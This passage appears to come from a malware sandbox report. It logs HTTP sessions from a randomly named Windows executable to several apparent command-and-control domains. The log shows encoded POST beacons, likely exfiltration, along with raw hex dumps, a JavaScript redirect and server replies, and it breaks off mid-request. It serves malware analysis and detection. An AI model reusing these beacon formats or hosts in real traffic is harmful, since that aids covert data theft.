                                      Sep 22, 2024 17:38:00.860290051 CEST552OUTGET /9s2o/?Bz=dVmT&H2y4Q2Q8=prWBQsAwrZpv7mHAq1FXByVARW5NjJRnrzAr3GgQzsI4A3w4ZA4WuBDFNuHRILf/rVXOedGSZ/C98FL7KLA1eCpMs9SPUaNqPsXwbtKHuIyZJdKU8IRxK90= HTTP/1.1
                                      Host: www.dhkatp.vip
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Sep 22, 2024 17:38:01.311247110 CEST392INHTTP/1.1 200 OK
                                      Server: openresty
                                      Date: Sun, 22 Sep 2024 15:38:01 GMT
                                      Content-Type: text/html
                                      Content-Length: 252
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 42 7a 3d 64 56 6d 54 26 48 32 79 34 51 32 51 38 3d 70 72 57 42 51 73 41 77 72 5a 70 76 37 6d 48 41 71 31 46 58 42 79 56 41 52 57 35 4e 6a 4a 52 6e 72 7a 41 72 33 47 67 51 7a 73 49 34 41 33 77 34 5a 41 34 57 75 42 44 46 4e 75 48 52 49 4c 66 2f 72 56 58 4f 65 64 47 53 5a 2f 43 39 38 46 4c 37 4b 4c 41 31 65 43 70 4d 73 39 53 50 55 61 4e 71 50 73 58 77 62 74 4b 48 75 49 79 5a 4a 64 4b 55 38 49 52 78 4b 39 30 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Bz=dVmT&H2y4Q2Q8=prWBQsAwrZpv7mHAq1FXByVARW5NjJRnrzAr3GgQzsI4A3w4ZA4WuBDFNuHRILf/rVXOedGSZ/C98FL7KLA1eCpMs9SPUaNqPsXwbtKHuIyZJdKU8IRxK90="}</script></head></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      33192.168.2.1249751134.119.247.136804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:38:06.360938072 CEST838OUTPOST /ekf2/ HTTP/1.1
                                      Host: www.new-wellness.net
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.new-wellness.net
                                      Referer: http://www.new-wellness.net/ekf2/
                                      Cache-Control: no-cache
                                      Content-Length: 205
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 54 45 68 5a 35 35 50 75 4c 76 33 4f 76 77 4f 61 43 38 4d 75 41 78 37 58 67 4e 78 5a 6c 4d 75 2b 4c 58 4f 63 6d 5a 75 7a 42 52 74 7a 53 62 65 44 74 64 78 48 75 4d 4c 44 38 4e 2b 2f 30 4b 6f 53 42 32 38 77 50 66 30 68 76 76 4d 62 72 67 44 71 6c 2f 37 39 58 4d 6f 61 32 36 31 66 2b 4f 75 53 62 65 45 41 79 64 69 5a 6f 2b 72 2f 4d 43 4b 45 62 6a 48 72 68 6a 53 75 4c 4b 68 42 70 42 4b 43 4c 2f 78 49 6e 52 69 65 48 66 56 33 39 66 51 4e 36 41 46 74 7a 79 6d 75 68 51 36 32 4e 71 6e 58 4c 74 6b 74 4e 45 63 35 64 4c 66 56 4d 55 66 35 62 61 63 79 61 2b 35 53 61 74 6c 31 62 73 49 55 46 77 3d 3d
                                      Data Ascii: H2y4Q2Q8=TEhZ55PuLv3OvwOaC8MuAx7XgNxZlMu+LXOcmZuzBRtzSbeDtdxHuMLD8N+/0KoSB28wPf0hvvMbrgDql/79XMoa261f+OuSbeEAydiZo+r/MCKEbjHrhjSuLKhBpBKCL/xInRieHfV39fQN6AFtzymuhQ62NqnXLtktNEc5dLfVMUf5bacya+5Satl1bsIUFw==
                                      Sep 22, 2024 17:38:06.979486942 CEST401INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:38:06 GMT
                                      Content-Type: text/html; charset=iso-8859-1
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Content-Encoding: gzip
                                      Data Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 10 85 f7 fe 8a 93 5d 0e 0d e3 a5 83 02 91 04 91 98 32 38 62 5a 53 12 a4 48 8b c6 7f 2f 85 c5 f1 dd fb ee cb a3 4d 72 39 8a 5b 95 c2 49 9c 0b a8 ea 43 91 1f 21 d8 22 e6 a9 c8 10 13 91 ac cd 3e 8c 10 d3 32 e0 8c b4 7b 76 9c b4 6a e4 1c 5c eb 3a c5 e3 28 86 d2 38 c8 cc d4 4b c2 f5 c8 08 17 88 ee 46 7e fd df 8e ff 31 73 62 34 70 a1 15 8c ea 35 29 eb 94 84 fa 5a c0 a7 b1 d0 cf dc c3 73 60 7a 70 ba b5 60 d5 f8 56 63 48 38 78 ef 62 9c 1d 7e 09 fb 01 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: adM10]28bZSH/Mr9[IC!">2{vj\:(8KF~1sb4p5)Zs`zp`VcH8xb~|<0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      34192.168.2.1249752134.119.247.136804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:38:08.908740044 CEST858OUTPOST /ekf2/ HTTP/1.1
                                      Host: www.new-wellness.net
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.new-wellness.net
                                      Referer: http://www.new-wellness.net/ekf2/
                                      Cache-Control: no-cache
                                      Content-Length: 225
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 54 45 68 5a 35 35 50 75 4c 76 33 4f 75 52 2b 61 42 65 6b 75 47 52 37 59 38 64 78 5a 72 73 75 36 4c 58 43 63 6d 63 50 32 42 6a 5a 7a 56 36 4f 44 75 63 78 48 76 4d 4c 44 6f 39 2b 36 36 71 6f 4a 42 32 77 34 50 61 30 68 76 76 59 62 72 6b 4c 71 6c 49 48 2b 52 4d 6f 69 36 61 31 64 78 75 75 53 62 65 45 41 79 64 32 6e 6f 39 62 2f 4e 79 61 45 61 48 54 73 70 44 53 74 64 61 68 42 74 42 4c 4c 4c 2f 77 64 6e 51 4f 6b 48 64 74 33 39 61 30 4e 36 30 52 79 6d 69 6d 6b 6c 51 37 78 4e 4b 57 2f 52 38 67 6a 4f 31 63 6c 41 4b 6d 33 45 79 4f 6a 45 6f 55 6b 50 39 74 66 58 36 63 46 57 76 31 64 65 38 58 64 6e 6e 33 71 6d 73 7a 50 33 71 32 68 39 72 74 67 71 49 38 3d
                                      Data Ascii: H2y4Q2Q8=TEhZ55PuLv3OuR+aBekuGR7Y8dxZrsu6LXCcmcP2BjZzV6ODucxHvMLDo9+66qoJB2w4Pa0hvvYbrkLqlIH+RMoi6a1dxuuSbeEAyd2no9b/NyaEaHTspDStdahBtBLLL/wdnQOkHdt39a0N60RymimklQ7xNKW/R8gjO1clAKm3EyOjEoUkP9tfX6cFWv1de8Xdnn3qmszP3q2h9rtgqI8=
                                      Sep 22, 2024 17:38:09.553278923 CEST401INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:38:09 GMT
                                      Content-Type: text/html; charset=iso-8859-1
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Content-Encoding: gzip
                                      Data Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 10 85 f7 fe 8a 93 5d 0e 0d e3 a5 83 02 91 04 91 98 32 38 62 5a 53 12 a4 48 8b c6 7f 2f 85 c5 f1 dd fb ee cb a3 4d 72 39 8a 5b 95 c2 49 9c 0b a8 ea 43 91 1f 21 d8 22 e6 a9 c8 10 13 91 ac cd 3e 8c 10 d3 32 e0 8c b4 7b 76 9c b4 6a e4 1c 5c eb 3a c5 e3 28 86 d2 38 c8 cc d4 4b c2 f5 c8 08 17 88 ee 46 7e fd df 8e ff 31 73 62 34 70 a1 15 8c ea 35 29 eb 94 84 fa 5a c0 a7 b1 d0 cf dc c3 73 60 7a 70 ba b5 60 d5 f8 56 63 48 38 78 ef 62 9c 1d 7e 09 fb 01 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: adM10]28bZSH/Mr9[IC!">2{vj\:(8KF~1sb4p5)Zs`zp`VcH8xb~|<0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      35192.168.2.1249753134.119.247.136804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:38:11.457020998 CEST1871OUTPOST /ekf2/ HTTP/1.1
                                      Host: www.new-wellness.net
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.new-wellness.net
                                      Referer: http://www.new-wellness.net/ekf2/
                                      Cache-Control: no-cache
                                      Content-Length: 1237
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 54 45 68 5a 35 35 50 75 4c 76 33 4f 75 52 2b 61 42 65 6b 75 47 52 37 59 38 64 78 5a 72 73 75 36 4c 58 43 63 6d 63 50 32 42 6a 42 7a 56 4e 4f 44 75 2f 4a 48 2b 38 4c 44 30 74 2b 37 36 71 70 4a 42 31 41 38 50 61 78 65 76 73 67 62 74 47 54 71 68 4d 54 2b 45 38 6f 69 79 36 31 59 2b 4f 76 51 62 65 55 45 79 64 6d 6e 6f 39 62 2f 4e 30 6d 45 4f 6a 48 73 6b 6a 53 75 4c 4b 67 54 70 42 4c 6a 4c 2f 34 4e 6e 51 36 4f 47 70 5a 33 6b 36 6b 4e 71 52 46 79 37 53 6d 71 70 77 37 54 4e 4b 61 67 52 38 73 42 4f 31 6f 66 41 4b 65 33 48 7a 6a 31 56 72 77 41 54 37 4e 6b 54 62 45 48 52 2f 31 65 56 4e 44 65 69 42 47 4f 72 2f 58 5a 37 61 54 76 70 34 35 2f 2b 2b 65 49 2b 6e 34 73 71 47 65 32 75 76 46 50 6c 4a 32 61 4f 74 48 4a 50 38 48 66 59 7a 38 4f 38 33 52 63 78 64 47 76 2f 31 30 63 4b 42 33 34 67 62 67 41 5a 4c 49 2b 67 69 6a 66 52 69 2f 31 57 67 61 4e 71 65 4c 53 49 7a 77 6e 2f 64 4b 30 74 74 47 49 36 5a 79 52 71 72 42 6e 44 6a 56 61 30 5a 58 46 71 52 76 30 51 57 36 58 78 4a 64 51 30 6f 73 61 63 [TRUNCATED]
                                      Data Ascii: H2y4Q2Q8=TEhZ55PuLv3OuR+aBekuGR7Y8dxZrsu6LXCcmcP2BjBzVNODu/JH+8LD0t+76qpJB1A8PaxevsgbtGTqhMT+E8oiy61Y+OvQbeUEydmno9b/N0mEOjHskjSuLKgTpBLjL/4NnQ6OGpZ3k6kNqRFy7Smqpw7TNKagR8sBO1ofAKe3Hzj1VrwAT7NkTbEHR/1eVNDeiBGOr/XZ7aTvp45/++eI+n4sqGe2uvFPlJ2aOtHJP8HfYz8O83RcxdGv/10cKB34gbgAZLI+gijfRi/1WgaNqeLSIzwn/dK0ttGI6ZyRqrBnDjVa0ZXFqRv0QW6XxJdQ0osacmXGmDuIdjIUozHsSGV4S2k17J/fBHkh+8tvDQgSo+v/Bm2UUUmwCP4/+ba3ndGzCPICCpZncjMpH7E39Ccn0nsx1FAtZEUZrvrIqKXEjeOsRdiiq7IPa5jBWgCDUBh0viSnqyK9Tt8SBcuqEtWGYXuG6qcvR7Cy6zDIpi7UTukc6nMxyh4QGOy+Oaz8mf8LcN3Kva8MbJv4JRXHdNb9OOCSy4nrkIOBGiXLPAT/b1R0BPRmKhM3w6/KhxlFwHk5tml4c1Jd+zuPqyu7flaHB8lN0a7BJBxIN+mDBIxXahMAq7bQUs5VXUGf+wuIOW107+N6vL1tkifZEEdj00T81sjXwr2VOg7mU9Fv8HA8H0D0L3Oa+Qb/g76GUoT5kQQyvq0nzxrlyzm+kXFTXJPxq25uC0iiVAFzePJip0Z5ngth8iez3CnqCfu0dU4iDboSOHAdRMwzyCrJT8Y9sq9bfSlJMdeWUWlZgSu+2+jUV8l2fOs8BJ/UxqvlmYHVUtSB2Pc8lB4Qo4yqj5m65qFSBz3Dio3/OcKqFN0M8vTlB3lgFQptGlzqeDwIj8tzf/sfbeXsLyQQp1bjcr/anqxYf2rKuUzWMDLaPdaKll8HYsVTrZGuC5Bo/gPSgPg/gyGm49Ju038fKqkaVNrMfwSvV41lLrh9plDxaCb [TRUNCATED]
                                      Sep 22, 2024 17:38:12.094388008 CEST401INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:38:12 GMT
                                      Content-Type: text/html; charset=iso-8859-1
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Content-Encoding: gzip
                                      Data Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 10 85 f7 fe 8a 93 5d 0e 0d e3 a5 83 02 91 04 91 98 32 38 62 5a 53 12 a4 48 8b c6 7f 2f 85 c5 f1 dd fb ee cb a3 4d 72 39 8a 5b 95 c2 49 9c 0b a8 ea 43 91 1f 21 d8 22 e6 a9 c8 10 13 91 ac cd 3e 8c 10 d3 32 e0 8c b4 7b 76 9c b4 6a e4 1c 5c eb 3a c5 e3 28 86 d2 38 c8 cc d4 4b c2 f5 c8 08 17 88 ee 46 7e fd df 8e ff 31 73 62 34 70 a1 15 8c ea 35 29 eb 94 84 fa 5a c0 a7 b1 d0 cf dc c3 73 60 7a 70 ba b5 60 d5 f8 56 63 48 38 78 ef 62 9c 1d 7e 09 fb 01 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: adM10]28bZSH/Mr9[IC!">2{vj\:(8KF~1sb4p5)Zs`zp`VcH8xb~|<0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      36192.168.2.1249754134.119.247.136804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:38:14.118634939 CEST558OUTGET /ekf2/?H2y4Q2Q8=eGJ56OPHB8ms9yLKA6o1AVbEgtJ1lMGREkC6jMn0bkkWaJWEmftp/abQzNeB3IUfOGcoIaMR8ugSslinjs3LGY8O9t1X/97Wa64G9saU8IPvFXfRaWKOmGA=&Bz=dVmT HTTP/1.1
                                      Host: www.new-wellness.net
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Sep 22, 2024 17:38:14.705265045 CEST382INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:38:14 GMT
                                      Content-Type: text/html; charset=iso-8859-1
                                      Content-Length: 196
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      37192.168.2.1249755208.91.197.27804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:38:27.967509031 CEST856OUTPOST /jdoy/ HTTP/1.1
                                      Host: www.yourhomecopilot.online
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.yourhomecopilot.online
                                      Referer: http://www.yourhomecopilot.online/jdoy/
                                      Cache-Control: no-cache
                                      Content-Length: 205
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 53 57 51 36 77 62 74 75 78 2b 2b 31 4b 34 52 5a 6f 6c 64 52 48 34 6c 43 36 46 43 63 76 74 38 42 61 4f 50 6c 6c 30 65 31 49 51 51 71 4a 41 55 59 75 34 33 66 72 68 6d 62 35 49 7a 53 4d 55 74 6e 6a 4c 6d 6e 34 72 62 59 33 4b 41 52 35 78 74 51 49 71 35 77 49 7a 50 55 46 4e 2f 6a 35 43 32 4e 6e 67 42 38 70 58 71 66 65 75 39 4f 57 6e 49 30 59 52 53 44 62 56 72 78 39 68 63 35 30 78 66 54 38 38 65 6d 50 30 6f 4e 38 37 37 79 38 2b 77 4d 33 70 6f 76 63 7a 74 76 68 75 65 58 53 65 73 38 49 66 6b 6a 45 55 76 34 76 35 63 36 6b 54 73 33 66 69 54 45 53 4a 43 69 76 33 49 71 52 47 76 78 59 51 3d 3d
                                      Data Ascii: H2y4Q2Q8=SWQ6wbtux++1K4RZoldRH4lC6FCcvt8BaOPll0e1IQQqJAUYu43frhmb5IzSMUtnjLmn4rbY3KAR5xtQIq5wIzPUFN/j5C2NngB8pXqfeu9OWnI0YRSDbVrx9hc50xfT88emP0oN877y8+wM3povcztvhueXSes8IfkjEUv4v5c6kTs3fiTESJCiv3IqRGvxYQ==


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      38192.168.2.1249756208.91.197.27804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:38:30.547646999 CEST876OUTPOST /jdoy/ HTTP/1.1
                                      Host: www.yourhomecopilot.online
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.yourhomecopilot.online
                                      Referer: http://www.yourhomecopilot.online/jdoy/
                                      Cache-Control: no-cache
                                      Content-Length: 225
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 53 57 51 36 77 62 74 75 78 2b 2b 31 4b 59 68 5a 37 45 64 52 57 49 6c 44 6b 56 43 63 6b 4e 38 46 61 4f 44 6c 6c 78 79 6c 49 69 45 71 4a 69 4d 59 76 35 33 66 6e 42 6d 62 33 6f 7a 58 43 30 73 6c 6a 4c 72 59 34 75 6a 59 33 4a 38 52 35 77 64 51 49 63 78 2f 4a 6a 50 57 4a 74 2f 6c 39 43 32 4e 6e 67 42 38 70 57 61 68 65 75 6c 4f 58 58 34 30 5a 77 53 41 52 31 72 32 2b 68 63 35 77 78 65 61 38 38 66 7a 50 31 30 72 38 2b 6e 79 38 2b 41 4d 33 39 30 67 56 7a 74 74 38 65 66 67 61 62 64 6f 50 76 6f 51 59 33 66 32 68 70 6f 47 73 31 39 74 41 51 62 53 48 4b 57 76 69 67 78 61 63 46 53 34 44 61 4f 42 70 5a 4f 5a 67 33 57 65 35 76 37 53 41 6f 4a 32 51 67 59 3d
                                      Data Ascii: H2y4Q2Q8=SWQ6wbtux++1KYhZ7EdRWIlDkVCckN8FaODllxylIiEqJiMYv53fnBmb3ozXC0sljLrY4ujY3J8R5wdQIcx/JjPWJt/l9C2NngB8pWaheulOXX40ZwSAR1r2+hc5wxea88fzP10r8+ny8+AM390gVztt8efgabdoPvoQY3f2hpoGs19tAQbSHKWvigxacFS4DaOBpZOZg3We5v7SAoJ2QgY=


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      39192.168.2.1249757208.91.197.27804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:38:33.097605944 CEST1889OUTPOST /jdoy/ HTTP/1.1
                                      Host: www.yourhomecopilot.online
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.yourhomecopilot.online
                                      Referer: http://www.yourhomecopilot.online/jdoy/
                                      Cache-Control: no-cache
                                      Content-Length: 1237
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 53 57 51 36 77 62 74 75 78 2b 2b 31 4b 59 68 5a 37 45 64 52 57 49 6c 44 6b 56 43 63 6b 4e 38 46 61 4f 44 6c 6c 78 79 6c 49 69 63 71 4a 52 45 59 67 36 76 66 6d 42 6d 62 6f 59 7a 57 43 30 73 6b 6a 4c 79 52 34 75 6d 74 33 50 77 52 34 57 4a 51 5a 4f 5a 2f 44 6a 50 57 55 64 2f 6b 35 43 32 69 6e 67 52 34 70 58 6d 68 65 75 6c 4f 58 56 77 30 65 68 53 41 58 31 72 78 39 68 63 31 30 78 66 2f 38 38 47 49 50 31 77 64 38 4e 2f 79 38 65 51 4d 37 6f 6f 67 61 7a 74 6a 2f 65 66 34 61 62 5a 65 50 76 31 70 59 32 36 64 68 71 34 47 75 45 41 7a 53 42 4b 50 45 71 65 6f 6c 67 6c 6c 45 6d 76 34 4d 59 65 57 6a 72 6d 72 6a 32 32 34 2b 34 50 59 54 4c 6c 58 4f 47 38 4e 2b 33 56 65 68 37 42 5a 38 71 2f 69 44 33 75 79 63 38 2f 54 4d 6d 4b 52 6c 35 4a 56 33 6a 61 6d 72 31 74 6f 34 72 71 73 31 71 6e 39 49 4b 75 6e 78 50 51 32 45 70 2b 77 77 5a 51 42 55 63 72 63 38 4e 59 6e 6e 4c 4f 54 75 6f 48 55 66 67 44 43 31 4c 4b 4a 50 51 58 6b 53 34 75 32 66 4b 6c 4e 33 71 55 7a 58 72 33 51 37 55 66 34 59 4b 4b 77 6a [TRUNCATED]
                                      Data Ascii: H2y4Q2Q8=SWQ6wbtux++1KYhZ7EdRWIlDkVCckN8FaODllxylIicqJREYg6vfmBmboYzWC0skjLyR4umt3PwR4WJQZOZ/DjPWUd/k5C2ingR4pXmheulOXVw0ehSAX1rx9hc10xf/88GIP1wd8N/y8eQM7oogaztj/ef4abZePv1pY26dhq4GuEAzSBKPEqeolgllEmv4MYeWjrmrj224+4PYTLlXOG8N+3Veh7BZ8q/iD3uyc8/TMmKRl5JV3jamr1to4rqs1qn9IKunxPQ2Ep+wwZQBUcrc8NYnnLOTuoHUfgDC1LKJPQXkS4u2fKlN3qUzXr3Q7Uf4YKKwjw9w9C8+jb1JcBta/v1P5l3y8Sl+g2qqTEnpcPEcmMECWU9mVhpnWSZ4PLpikgPvdsPMo9WU8RW4JcjoxxnYP/RiPQYHRermpkzqIyPkg+hJ3kq1xfhYhN9shCamn410dcnvxlXqEKiY0/6K/VCstNOycR525MQiLJMeKKT1N6mwtHhwGGIVdBm9ZnPp26i9+B48kBrRvMajURPTtWVnxAoU1tYgiMba9J0QzbZrr1F8LPRijHZvUKhiRF50e1vwZSwyeR1OTZMSTw/R7DY20OB1D+ltK24ePR9k82dGfnmGaW4pC9cIbI4CpKhbv2gDM65Eq4v3/z/OOPZHRYTKllVgR81miLC1s4HJ/5tNhI1ezYhGQR3Ve5HkLFvfBgDm1y507wUw9rwPfS3l0rUEuoUG9WtAhHj5JLKklEX6aSo4L6gYQu4odQW4UtoHbkWD/4ryIsfjy7flbPKAHxnWGMs1cHoYOkt6O72oXH3LtRlzTdsA5Z3z3qe0Tf3wjU+U/vpvtcc2QkTjC0pyr8qoh53lSWuhv/SQKCc83Q7pXTJghZVKUmW8570/eSY48Rwy5adbtcJbmQoNrtjBKnUx4EECPA8NcuDKHYrhRlDakOMbjxVn4FqMT5XnQyCQ1lubjZlldIXTeHmmRTClf5ZxMlySggHqaYtVsaG [TRUNCATED]


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      40192.168.2.1249758208.91.197.27804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:38:35.643050909 CEST564OUTGET /jdoy/?H2y4Q2Q8=fU4azshV0/DNX5FGmAV3JOEf7EKImuQsYvPexFWWcX9MIQ9nvaf6vDqBy6zpBn81oaqc3e/vpJAI/CRbOPpzHFqQC8jTwTTdv0trviStTJwFUFFtQyn4XQk=&Bz=dVmT HTTP/1.1
                                      Host: www.yourhomecopilot.online
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
